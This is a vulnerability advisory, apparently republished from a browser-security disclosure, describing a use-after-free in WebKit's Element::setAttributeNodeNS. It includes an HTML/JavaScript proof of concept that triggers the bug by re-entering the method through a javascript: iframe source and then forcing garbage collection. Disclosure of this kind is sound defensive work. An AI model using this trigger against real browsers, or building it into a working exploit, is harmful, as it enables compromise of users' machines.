WebKit Element::setAttributeNodeNS Use-After-Free

2017.06.01
Credit: lokihardt
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

WebKit: Element::setAttributeNodeNS UAF Here's a snippet of Element::setAttributeNodeNS. ExceptionOr<RefPtr<Attr>> Element::setAttributeNodeNS(Attr& attrNode) { ... setAttributeInternal(index, attrNode.qualifiedName(), attrNode.value(), NotInSynchronizationOfLazyAttribute); attrNode.attachToElement(*this); treeScope().adoptIfNeeded(attrNode); ensureAttrNodeListForElement(*this).append(&attrNode); return WTFMove(oldAttrNode); } |setAttributeInternal| may execute arbitrary JavaScript. If |setAttributeNodeNS| is called again in |setAttributeInternal|, there will be two |Attr| that has the same owner element and the same name after the first |setAttributeNodeNS| call. One of the |Attr|s will hold the raw pointer of the owner element even if the owner element is freed. PoC: <body> <script> function gc() { for (let i = 0; i < 0x40; i++) { new ArrayBuffer(0x1000000); } } window.callback = () => { window.callback = null; d.setAttributeNodeNS(src); f.setAttributeNodeNS(document.createAttribute('src')); }; let src = document.createAttribute('src'); src.value = 'javascript:parent.callback()'; let d = document.createElement('div'); let f = document.body.appendChild(document.createElement('iframe')); f.setAttributeNodeNS(src); f.remove(); f = null; src = null; gc(); alert(d.attributes[0].ownerElement); </script> </body> This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: lokihardt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top